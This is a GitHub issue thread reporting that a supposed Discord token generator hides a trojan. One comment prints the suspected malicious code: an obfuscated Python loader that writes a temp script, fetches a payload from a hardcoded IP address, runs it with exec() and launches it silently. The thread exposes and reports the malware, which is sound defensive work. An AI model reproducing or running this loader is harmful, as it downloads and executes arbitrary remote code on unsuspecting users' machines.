### ISSUE TITLE
Trojan!

### ISSUE THREAD

**Issue by megaredb** [Squeezy28/discord-token-generator#3]
![image](https://user-images.githubusercontent.com/57312612/220367114-4922fe00-d05f-4ee3-a589-f436e49dac1f.png)
https://github.com/Squeezy28/discord-token-generator/blob/main/main.py#L51

**Comment by Turkisec** [comment]
yup i saw that i send a report to github support with the info they will check it and ban him soon

**Comment by MrMiget** [comment]
from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://45.142.104.139:80/inject/OrFBzk8qVsucpbuI').read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass
